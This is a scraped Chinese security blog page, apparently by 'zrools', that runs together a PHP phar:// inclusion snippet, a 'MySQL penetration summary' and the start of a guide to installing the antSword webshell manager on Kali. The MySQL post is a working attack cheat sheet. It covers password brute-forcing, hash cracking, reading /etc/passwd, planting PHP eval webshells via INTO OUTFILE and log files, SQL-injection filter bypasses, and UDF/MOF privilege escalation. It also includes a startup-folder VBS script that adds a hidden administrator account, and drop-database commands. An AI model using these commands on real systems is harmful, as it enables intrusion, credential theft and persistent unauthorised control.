<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PHP版本 &gt;&#x3D; 5.3.0</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?file&#x3D;phar:&#x2F;&#x2F;phpinfo.zip&#x2F;phpinfo.txt</span><br><span class="line"></span><br><span class="line">?file&#x3D;phar:&#x2F;&#x2F;C:&#x2F;uploads&#x2F;phpinfo.zip&#x2F;phpinfo.txt</span><br></pre></td></tr></table></figure>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/03/MySQL-%E6%B8%97%E9%80%8F%E5%B0%8F%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/03/MySQL-%E6%B8%97%E9%80%8F%E5%B0%8F%E7%BB%93/" itemprop="url">MySQL 渗透小结</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-03T10:08:07+08:00">
                2020-03-03
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <h2 id="基本操作"><a href="#基本操作" class="headerlink" title="基本操作"></a>基本操作</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><ul>
<li><p>端口号： <code>3306</code></p>
</li>
<li><p>注释符： <code>/**/、 /*!xxx*/、 #、 -- a、 `、 ;%00</code></p>
</li>
<li><p>版本号： <code>SELECT @@VERSION;、SELECT version();</code></p>
</li>
<li><p>当前用户： <code>SELECT user();、 SELECT system_user();</code></p>
</li>
<li><p>当前数据库： <code>SELECT database();</code></p>
</li>
<li><p>数据库信息： <code>information_schema (&gt;= MySQL 5.0)</code></p>
</li>
<li><p>其他查询</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">session_user()          连接数据库的用户名</span><br><span class="line">@@datadir               数据库路径</span><br><span class="line">@@basedir               MYSQL 安装路径</span><br><span class="line">@@version_compile_os    操作系统</span><br><span class="line"></span><br><span class="line">show databases;   列数据库</span><br><span class="line">show tables [from db_name];     列数据表</span><br><span class="line">show columns from tb_name [from db_name];     列字段</span><br><span class="line"></span><br><span class="line">select user, password from user;   &lt; 5.7</span><br><span class="line">select user, authentication_string from user;   &gt;&#x3D; 5.7</span><br><span class="line"></span><br><span class="line">select @@plugin_dir ;  查看plugin文件夹</span><br><span class="line">show variables like ‘%plugin%’;</span><br></pre></td></tr></table></figure>

<h3 id="远程查看版本"><a href="#远程查看版本" class="headerlink" title="远程查看版本"></a>远程查看版本</h3><ul>
<li>使用 telnet</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">telnet 192.168.56.5 3306</span><br></pre></td></tr></table></figure>

<ul>
<li>使用 MSF</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use auxiliary&#x2F;scanner&#x2F;mysql&#x2F;mysql_version</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(scanner&#x2F;mysql&#x2F;mysql_version) &gt; set rhosts 192.168.56.5</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(scanner&#x2F;mysql&#x2F;mysql_version) &gt; run</span><br><span class="line"></span><br><span class="line">[+] 192.168.56.5:3306     - 192.168.56.5:3306 is running MySQL 5.7.26 (protocol 10)</span><br><span class="line">[*] 192.168.56.5:3306     - Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></table></figure>

<h3 id="密码枚举"><a href="#密码枚举" class="headerlink" title="密码枚举"></a>密码枚举</h3><ul>
<li>使用 patator</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">patator mysql_login user&#x3D;root password&#x3D;FILE0 0&#x3D;&#x2F;root&#x2F;passes.txt host&#x3D;127.0.0.1 -x ignore:fgrep&#x3D;&#39;Access denied for user&#39;</span><br></pre></td></tr></table></figure>

<ul>
<li>使用 MSF</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use auxiliary&#x2F;scanner&#x2F;mysql&#x2F;mysql_login</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(scanner&#x2F;mysql&#x2F;mysql_login) &gt; set rhosts 192.168.56.5</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(scanner&#x2F;mysql&#x2F;mysql_login) &gt; set PASS_FILE &quot;&#x2F;root&#x2F;passes.txt&quot;</span><br><span class="line"></span><br><span class="line">msf5 auxiliary(scanner&#x2F;mysql&#x2F;mysql_login) &gt; run</span><br></pre></td></tr></table></figure>

<h3 id="HASH-破解"><a href="#HASH-破解" class="headerlink" title="HASH 破解"></a>HASH 破解</h3><ul>
<li>使用 john</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john --format&#x3D;mysql-sha1 hashes.txt</span><br></pre></td></tr></table></figure>

<ul>
<li>使用 hashcat hashes.txt </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 300 hashes.txt &#x2F;root&#x2F;passes.txt</span><br></pre></td></tr></table></figure>

<h3 id="删库"><a href="#删库" class="headerlink" title="删库"></a>删库</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">drop table tbname;</span><br><span class="line"></span><br><span class="line">drop database dbname;</span><br></pre></td></tr></table></figure>

<h2 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h2><ul>
<li>secure-file-priv</li>
</ul>
<p>MySQL &gt;= 5.7 时， <code>secure-file-priv</code>为<code>NULL</code>表示限制导入导出文件，需要在<code>my.ini</code>中修改<code>secure_file_priv=&#39;&#39;</code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#39;%secure%&#39;;</span><br></pre></td></tr></table></figure>

<ul>
<li>读文件</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select load_file(&#39;&#x2F;etc&#x2F;passwd&#39;);</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create table xxx(txt text);</span><br><span class="line"></span><br><span class="line">load data infile &#39;&#x2F;tmp&#x2F;1.txt&#39; into table xxx;</span><br><span class="line"></span><br><span class="line">select * from xxx;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap --file-read &#39;&#x2F;tmp&#x2F;1.txt&#39;</span><br></pre></td></tr></table></figure>


<ul>
<li>远程dump数据</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysqldump -h 192.168.16.5 -u root -p root database &gt; dump.sql</span><br></pre></td></tr></table></figure>

<ul>
<li>写文件</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#39;&lt;?php @eval($_POST[1]);?&gt;&#39; INTO OUTFILE &#39;D:&#x2F;www&#x2F;z.php&#39;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap --file-write &#39;&#x2F;root&#x2F;z.php&#39; --file-dest &#39;D:&#x2F;www&#x2F;z.php&#39;</span><br></pre></td></tr></table></figure>

<ul>
<li>日志写shell</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">set global general_log&#x3D;&#39;on&#39;;</span><br><span class="line"></span><br><span class="line">set global general_log_file&#x3D;&#39;D:&#x2F;www&#x2F;z.php&#39;;</span><br><span class="line"></span><br><span class="line">select &#39;&lt;?php @eval($_POST[1]); ?&gt;&#39;;</span><br><span class="line"></span><br><span class="line">set global general_log&#x3D;&#39;off&#39;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">set GLOBAL slow_query_log_file&#x3D;&#39;D:&#x2F;www&#x2F;z.php&#39;;</span><br><span class="line"></span><br><span class="line">set GLOBAL slow_query_log&#x3D;&#39;on&#39;;</span><br><span class="line"></span><br><span class="line">set GLOBAL log_queries_not_using_indexes&#x3D;&#39;on&#39;;</span><br></pre></td></tr></table></figure>

<h2 id="SQL-注入"><a href="#SQL-注入" class="headerlink" title="SQL 注入"></a>SQL 注入</h2><h3 id="编码相关"><a href="#编码相关" class="headerlink" title="编码相关"></a>编码相关</h3><ul>
<li>ASCII</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select char(97, 98, 99);</span><br></pre></td></tr></table></figure>

<ul>
<li>hex</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select hex(979899);</span><br></pre></td></tr></table></figure>

<ul>
<li>base64</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">to_base64();、from_base64();    v &gt; 5.6.1</span><br></pre></td></tr></table></figure>

<ul>
<li>unicode</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%u0027 %u02b9 %u02bc</span><br></pre></td></tr></table></figure>

<ul>
<li>宽字节注入</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%df%27 -&gt; (addslashes) -&gt; %df%5c%27 -&gt; (GBK) -&gt; 運’</span><br></pre></td></tr></table></figure>

<h3 id="绕过相关"><a href="#绕过相关" class="headerlink" title="绕过相关"></a>绕过相关</h3><ul>
<li>过滤等号</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">like、in</span><br></pre></td></tr></table></figure>

<ul>
<li>过滤逗号</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(select 1)a join (select 2)b join (select 3)c；</span><br></pre></td></tr></table></figure>

<ul>
<li>过滤空格</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%09%0A %0B %0C %0D %A0 %20 &#x2F;**&#x2F;</span><br></pre></td></tr></table></figure>

<p>过滤比较符号(&lt;&gt;)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">greatest(x,y,z,..)、between 1 and 5</span><br></pre></td></tr></table></figure>

<ul>
<li>等价函数</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">hex()、bin() -&gt; ascii()</span><br><span class="line"></span><br><span class="line">mid()、substr() -&gt; substring()</span><br><span class="line"></span><br><span class="line">sleep() -&gt; benchmark()</span><br><span class="line"></span><br><span class="line">@@version -&gt; version()</span><br><span class="line"></span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><h3 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h3><p>UDF（User Defined Function）用户自定义函数，是MySQL的一个拓展接口，利用MySQL的自定义函数功能，将MySQL账号转化为系统权限。</p>
<ul>
<li>UDF 文件位置</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Linux&#x2F;Windows： MySQL安装目录 -&gt; plugin目录</span><br><span class="line"></span><br><span class="line">Windowns 2003： c:\windows\system32  &lt; 5.1版本</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">sqlmap</span><br><span class="line"></span><br><span class="line">&#x2F;usr&#x2F;share&#x2F;sqlmap&#x2F;data&#x2F;udf&#x2F;mysql&#x2F;</span><br><span class="line"></span><br><span class="line">python &#x2F;usr&#x2F;share&#x2F;sqlmap&#x2F;extra&#x2F;cloak&#x2F;cloak.py lib_mysqludf_sys.so_ -o linux_udf_64.so</span><br><span class="line"></span><br><span class="line">MSF</span><br><span class="line"></span><br><span class="line">&#x2F;usr&#x2F;share&#x2F;metasploit-framework&#x2F;data&#x2F;exploits&#x2F;mysql&#x2F;</span><br><span class="line"></span><br><span class="line">lib_mysqludf_sys_32.dll  lib_mysqludf_sys_32.so</span><br><span class="line"></span><br><span class="line">lib_mysqludf_sys_64.dll  lib_mysqludf_sys_64.so</span><br></pre></td></tr></table></figure>

<ul>
<li>使用 sqlmap</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -d mysql:&#x2F;&#x2F;root:root@192.168.56.5:3306&#x2F;mysql --os-shell</span><br></pre></td></tr></table></figure>

<ul>
<li>使用 MSF</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit&#x2F;multi&#x2F;mysql&#x2F;mysql_udf_payload</span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;mysql&#x2F;mysql_udf_payload) &gt; set rhosts 192.168.56.5</span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;mysql&#x2F;mysql_udf_payload) &gt; set password root</span><br><span class="line"></span><br><span class="line">msf5 exploit(multi&#x2F;mysql&#x2F;mysql_udf_payload) &gt; run</span><br></pre></td></tr></table></figure>

<ul>
<li>plugin文件夹</li>
</ul>
<p>默认情况下/lib/plugin目录是不存在的，可用NTFS ADS流来创建文件夹。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">select @@plugin_dir;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;创建lib目录</span><br><span class="line">select &#39;test&#39; into dumpfile &#39;C:\\phpstudy_pro\\Extensions\\MySQL\\lib::$INDEX_ALLOCATION&#39;;</span><br><span class="line">select &#39;test&#39; into outfile &#39;C:\\phpstudy_pro\\Extensions\\MySQL\\lib::$INDEX_ALLOCATION&#39;;</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 创建plugin目录</span><br><span class="line">select &#39;test&#39; into dumpfile &#39;C:\\phpstudy_pro\\Extensions\\MySQL\\lib\\plugin::$INDEX_ALLOCATION&#39;;</span><br><span class="line">select &#39;test&#39; into outfile &#39;C:\\phpstudy_pro\\Extensions\\MySQL\\lib\\plugin::$INDEX_ALLOCATION&#39;;</span><br></pre></td></tr></table></figure>

<h3 id="MOF-提权"><a href="#MOF-提权" class="headerlink" title="MOF 提权"></a>MOF 提权</h3><p>MOF（托管对象格式），利用了<code>c:/windows/system32/wbem/mof/</code>目录下的<code>nullevt.mof</code>文件，每分钟都会在一个特定的时间去执行一次的特性（system权限），来写入cmd命令使其被带入执行。</p>
<ul>
<li>使用 MSF</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit&#x2F;windows&#x2F;mysql&#x2F;mysql_mof</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;mysql&#x2F;mysql_mof) &gt; set rhosts 192.168.56.5</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;mysql&#x2F;mysql_mof) &gt; set username root</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;mysql&#x2F;mysql_mof) &gt; set password root</span><br><span class="line"></span><br><span class="line">msf5 exploit(windows&#x2F;mysql&#x2F;mysql_mof) &gt; run</span><br></pre></td></tr></table></figure>

<h3 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h3><p>将VBS脚本写入自启动目录：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\</span><br><span class="line"></span><br><span class="line">C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\</span><br><span class="line"></span><br><span class="line">C:\\Users\\&#123;username&#125;\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">setwsnetwork&#x3D;CreateObject(&quot;WSCRIPT.NETWORK&quot;)</span><br><span class="line">os&#x3D;&quot;WinNT:&#x2F;&#x2F;&quot;&amp;wsnetwork.ComputerName</span><br><span class="line">Set ob&#x3D;GetObject(os)</span><br><span class="line">Setoe&#x3D;GetObject(os&amp;&quot;&#x2F;Administrators,group&quot;)</span><br><span class="line">Set od&#x3D;ob.Create(&quot;user&quot;,&quot;test&quot;)</span><br><span class="line">od.SetPassword “123456”</span><br><span class="line">od.SetInfo</span><br><span class="line">Set of&#x3D;GetObject(os&amp;&quot;&#x2F;test&quot;,user)</span><br><span class="line">oe.add os&amp;&quot;&#x2F;test&quot;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create table a (cmd text); </span><br><span class="line">insert into a values (&quot;set wshshell&#x3D;createobject (&quot;&quot;wscript.shell&quot;&quot;) &quot; ); </span><br><span class="line">insert into a values (&quot;a&#x3D;wshshell.run (&quot;&quot;cmd.exe &#x2F;c net user test 123456 &#x2F;add&quot;&quot;,0) &quot; ); </span><br><span class="line">insert into a values (&quot;b&#x3D;wshshell.run (&quot;&quot;cmd.exe &#x2F;c net localgroup administrators test &#x2F;add&quot;&quot;,0) &quot; ); </span><br><span class="line">select * from a into outfile &quot;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\test.vbs&quot;;</span><br></pre></td></tr></table></figure>


<h2 id="CVE"><a href="#CVE" class="headerlink" title="CVE"></a>CVE</h2><h3 id="CVE-2012-2122"><a href="#CVE-2012-2122" class="headerlink" title="CVE-2012-2122"></a>CVE-2012-2122</h3><p>身份认证漏洞， 由于输入密码与正确的密码比较不正确的处理，会导致即便是memcmp()返回一个非零值，使得MySQL认为两个密码是相同的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use auxiliary&#x2F;scanner&#x2F;mysql&#x2F;mysql_authbypass_hashdump</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2016-6662"><a href="#CVE-2016-6662" class="headerlink" title="CVE-2016-6662"></a>CVE-2016-6662</h3><p>影响版本： MySQL &lt;= 5.7.14 MySQL &lt;= 5.6.32 MySQL &lt;= 5.5.51</p>
<p>MySQL的默认安装包里自带了一个mysqld_safe的脚本用来启动mysql的服务进程，该进程能够在启动之前预加载共享库文件，攻击者可注入my.cnf文件，待MySQL重启可加载恶意代码。</p>
<p>CVE-2016-6662 参考： <a href="https://paper.seebug.org/46/" target="_blank" rel="noopener">https://paper.seebug.org/46/</a></p>

          
    </div>
    
    
    <footer class="post-footer">
      

        <div class="post-eof"></div>
      
    </footer>
  </div>
  
  
  </article>


  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/01/Kali-%E6%BA%90%E7%A0%81%E5%AE%89%E8%A3%85-antSword-%E4%B8%AD%E5%9B%BD%E8%9A%81%E5%89%91-v2-1-8-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
          <h1 class="post-title" itemprop="name headline">
                
                <a class="post-title-link" href="/2020/03/01/Kali-%E6%BA%90%E7%A0%81%E5%AE%89%E8%A3%85-antSword-%E4%B8%AD%E5%9B%BD%E8%9A%81%E5%89%91-v2-1-8-1/" itemprop="url">Kali 源码安装 antSword (中国蚁剑) v2.1.8.1</a></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-01T18:57:04+08:00">
                2020-03-01
              </time>
            

          </span>

          
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
            <h2 id="安装环境"><a href="#安装环境" class="headerlink" title="安装环境"></a>安装环境</h2><ul>
<li>Kali Linux 2020.1</li>
<li>antSword v2.1.8.1</li>
</ul>
<h2 id="加载器安装"><a href="#加载器安装" class="headerlink" title="加载器安装"></a>加载器安装</h2><p>antSword 从<code>v2.0.0-beta</code>版本开始引入加载器，只需要下载对应平台的加载器，无需安装额外的环境，可直接运行当前最新的开发版和发行版源代码。</p>
<p>具体操作步骤见官方文档：</p>
<p><a href="https://github.com/AntSwordProject/AntSword-Loader" target="_blank" rel="noopener">https://github.com/AntSwordProject/AntSword-Loader</a></p>
<h2 id="源代码安装"><a href="#源代码安装" class="headerlink" title="源代码安装"></a>源代码安装</h2><p>没有加载器，直接下载源码在Kali环境安装，是需要修改一些地方才能正常使用的。</p>
<h3 id="源码下载"><a href="#源码下载" class="headerlink" title="源码下载"></a>源码下载</h3><p>直接<code>git clone</code>最新版本(当前为<code>v2.1.8.1</code>)到当地目录。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git clone https:&#x2F;&#x2F;github.com&#x2F;AntSwordProject&#x2F;AntSword.git</span><br></pre></td></tr></table></figure>

<p>因为系统<code>nodejs</code>版本比较新，<code>electron</code>等包可能会有不兼容的情况，为了偷懒，我把<code>node_modules</code>目录直接删了，重新安装最新的，出现问题再作修改，以下操作默认在<code>antSword</code>目录进行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ rm -rf node_modules&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="不太长版"><a href="#不太长版" class="headerlink" title="不太长版"></a>不太长版</h2><p>修改<code>package.json</code>里的版本号<code>2.8.1.1</code>为<code>2.8.1</code>和<code>scripts</code>的<code>start</code>修改为<code>electron app.js</code></p>
<p>修改<code>app.js</code>，将<code>protocol.registerStandardSchemes([&#39;ant-views&#39;, &#39;ant-static&#39;, &#39;ant-src&#39;]);</code>替换为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">process.env.AS_WORKDIR &#x3D; process.env.PWD</span><br><span class="line"></span><br><span class="line">protocol.registerSchemesAsPrivileged([</span><br><span class="line">    &#123; scheme: &#39;ant-views&#39;, privileges: &#123; standard: true &#125; &#125;, </span><br><span class="line">    &#123; scheme: &#39;ant-static&#39;, privileges: &#123; standard: true &#125; &#125;, </span><br><span class="line">    &#123; scheme: &#39;ant-src&#39;, privileges: &#123; standard: true &#125; &#125;</span><br><span class="line">]);</span><br></pre></td></tr></table></figure>

<p>然后执行命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ ncu -u   # 更新依赖包</span><br><span class="line">$ npm install</span><br><span class="line">$ ELECTRON_CUSTOM_DIR&#x3D;8.0.0 npm install electron@8.0.0 --electron_mirror&#x3D;https:&#x2F;&#x2F;npm.taobao.org&#x2F;mirrors&#x2F;electron&#x2F;</span><br><span class="line"></span><br><span class="line">sudo chown root:root .&#x2F;node_modules&#x2F;electron&#x2F;dist&#x2F;chrome-sandbox</span><br><span class="line">sudo sudo chmod 4755 .&#x2F;node_modules&#x2F;electron&#x2F;dist&#x2F;chrome-sandbox</span><br><span class="line"></span><br><span class="line">$ npm start   # 启动</span><br></pre></td></tr></table></figure>

<h2 id="问题排除版"><a href="#问题排除版" class="headerlink" title="问题排除版"></a>问题排除版</h2><h3 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h3><p>没有<code>nodejs</code>环境和<code>npm</code>命令的先安装。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install npm nodejs</span><br><span class="line"></span><br><span class="line">npm install -g npm-check-updates</span><br></pre></td></tr></table></figure>

<h3 id="安装依赖包"><a href="#安装依赖包" class="headerlink" title="安装依赖包"></a>安装依赖包</h3><p>先将<code>package.json</code>里的<code>dependencies</code>依赖包版本更新：</p>
